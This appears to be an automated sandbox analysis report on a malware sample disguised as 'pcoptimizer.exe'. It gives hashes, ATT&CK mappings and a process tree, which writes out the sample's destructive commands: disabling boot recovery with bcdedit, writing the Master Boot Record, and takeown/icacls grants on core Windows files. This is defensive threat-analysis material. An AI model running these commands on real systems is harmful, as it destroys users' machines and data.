b308979b80ff6586c755a2e72fb988819ae4b50fb021ab0d1f27b0c6899d2bc1

Analysis

max time kernel
0s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
01-07-2024 02:23

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

pcoptimizer.exe
Size

212KB
MD5

eeaef69144b4ff2e3fb398bb0c880dbe
SHA1

69c4958b752e615f829cb50846a651b996ec9b9d
SHA256

b308979b80ff6586c755a2e72fb988819ae4b50fb021ab0d1f27b0c6899d2bc1
SHA512

5a5ec302a4f379244e757967c759a988844e35be2edfe19c705641ca3bbaa48d1b948c58046d51fe95a927cbc89539bef583549807bd04a6a4381ebf3d1fb0f9
SSDEEP

6144:at5hBPi0BW69hd1MMdxPe9N9uA069TBZlU25hFDaXb0:atzww69T7q25zDP

Score

9^/10

bootkit defense_evasion discovery evasion exploit persistence ransomware

Malware Config

Signatures

Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exe

pid process

1508 bcdedit.exe

pid	process
1508	bcdedit.exe

Possible privilege escalation attempt 14 IoCs

exploit

Processes:

takeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exe

pid	process
1828	takeown.exe
4236	takeown.exe
3132	takeown.exe
3260	icacls.exe
4856	icacls.exe
4544	takeown.exe
4708	takeown.exe
5116	icacls.exe
400	icacls.exe
4264	takeown.exe
2188	takeown.exe
1152	icacls.exe
3768	icacls.exe
4604	icacls.exe

Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

4784 attrib.exe
Executes dropped EXE 1 IoCs

Processes:

mbr.exe

pid process

4088 mbr.exe

pid	process
4784	attrib.exe

pid	process
4088	mbr.exe

Modifies file permissions 1 TTPs 14 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exe

pid	process
4856	icacls.exe
1152	icacls.exe
4236	takeown.exe
4264	takeown.exe
2188	takeown.exe
3260	icacls.exe
4544	takeown.exe
4708	takeown.exe
400	icacls.exe
3768	icacls.exe
4604	icacls.exe
3132	takeown.exe
5116	icacls.exe
1828	takeown.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1542.003

Processes:

mbr.exe

description ioc process

File opened for modification \??\PhysicalDrive0 mbr.exe
Drops file in System32 directory 3 IoCs

Processes:

cmd.exeattrib.exe

description ioc process

File created C:\Windows\System32\mbr.exe cmd.exe
File opened for modification C:\Windows\System32\mbr.exe cmd.exe
File opened for modification C:\Windows\System32\mbr.exe attrib.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4204 taskkill.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

takeown.exe

description pid process

Token: SeTakeOwnershipPrivilege 4264 takeown.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	mbr.exe

description	ioc	process
File created	C:\Windows\System32\mbr.exe	cmd.exe
File opened for modification	C:\Windows\System32\mbr.exe	cmd.exe
File opened for modification	C:\Windows\System32\mbr.exe	attrib.exe

pid	process
4204	taskkill.exe

description	pid	process
Token: SeTakeOwnershipPrivilege	4264	takeown.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

pcoptimizer.execmd.exe

description	pid	process	target process
PID 3692 wrote to memory of 1404	3692	pcoptimizer.exe	cmd.exe
PID 3692 wrote to memory of 1404	3692	pcoptimizer.exe	cmd.exe
PID 1404 wrote to memory of 1508	1404	cmd.exe	bcdedit.exe
PID 1404 wrote to memory of 1508	1404	cmd.exe	bcdedit.exe
PID 1404 wrote to memory of 4784	1404	cmd.exe	attrib.exe
PID 1404 wrote to memory of 4784	1404	cmd.exe	attrib.exe
PID 1404 wrote to memory of 4088	1404	cmd.exe	mbr.exe
PID 1404 wrote to memory of 4088	1404	cmd.exe	mbr.exe
PID 1404 wrote to memory of 4088	1404	cmd.exe	mbr.exe
PID 1404 wrote to memory of 4264	1404	cmd.exe	takeown.exe
PID 1404 wrote to memory of 4264	1404	cmd.exe	takeown.exe
PID 1404 wrote to memory of 400	1404	cmd.exe	icacls.exe
PID 1404 wrote to memory of 400	1404	cmd.exe	icacls.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

4784 attrib.exe

pid	process
4784	attrib.exe

C:\Users\Admin\AppData\Local\Temp\pcoptimizer.exe
"C:\Users\Admin\AppData\Local\Temp\pcoptimizer.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3692

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4016.tmp\4017.tmp\4018.bat C:\Users\Admin\AppData\Local\Temp\pcoptimizer.exe"
2⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1404

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
3⤵
- Modifies boot configuration data using bcdedit
PID:1508

C:\Windows\system32\attrib.exe
attrib +s +h C:\Windows\System32\mbr.exe
3⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
PID:4784

C:\Windows\System32\mbr.exe
C:\Windows\System32\mbr.exe
3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:4088

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\ntoskrnl.exe"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4264

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\ntoskrnl.exe" /grant everyone:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:400

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\hal.dll"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3132

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\hal.dll" /grant everyone:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4604

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\ci.dll"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1828

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\ci.dll" /grant everyone:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5116

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\winload.efi"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4708

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\winload.efi" /grant everyone:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4856

C:\Windows\system32\takeown.exe
takeown /f "C:\Program Files\WindowsApps"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4544

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\WindowsApps" /grant everyone:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1152

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\SystemApps"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4236

C:\Windows\system32\icacls.exe
icacls "C:\Windows\SystemApps" /grant everyone:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3768

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\ImmersiveControlPanel"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2188

C:\Windows\system32\icacls.exe
icacls "C:\Windows\ImmersiveControlPanel" /grant everyone:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3260

C:\Windows\system32\taskkill.exe
taskkill /f /im discord.exe
3⤵
- Kills process with taskkill
PID:4204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell wininit
3⤵
PID:776

C:\Windows\system32\wininit.exe
"C:\Windows\system32\wininit.exe"
4⤵
PID:684

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4016.tmp\4017.tmp\4018.bat
Filesize
1KB

MD5
c076d53a79bdea72d3252f6e7eabec00

SHA1
bd016c13f09b771218cbb2fed51d0d9c722f439d

SHA256
de3b425e1d62e1d24b9cef8e46a06b00ad08ee3bd08e9e99499de13f7043eb9f

SHA512
f8b18940bb8b61a23d9b700913dc6336bff5b309bca30012bf9d62a06d8c7df2c2e0adccf9670c120bb4b707e2cdbe3587fce266a6bb0409b3e5caee9011f6bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qhufzkx1.qpq.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\System32\mbr.exe
Filesize
47KB

MD5
8562ed46d745dceb3cc268693ca25c83

SHA1
309067f0c9703084654495a47e67f7a40824700d

SHA256
ea5d21e6598d52b30e9d055bc406c6227bbadb5c493addb27b32fb16a6dcae8c

SHA512
52f23e70f7ea6eab1a50a4008e563d787732f7361dfe10c48f39dae42bce023c90449c9a903733fab13c49b50f8c4fa7d4864ab26c69326aab0149c765fd677b

Download Submit
memory/776-15-0x0000018EF2530000-0x0000018EF2552000-memory.dmp

Filesize
136KB

Download
memory/4088-9-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads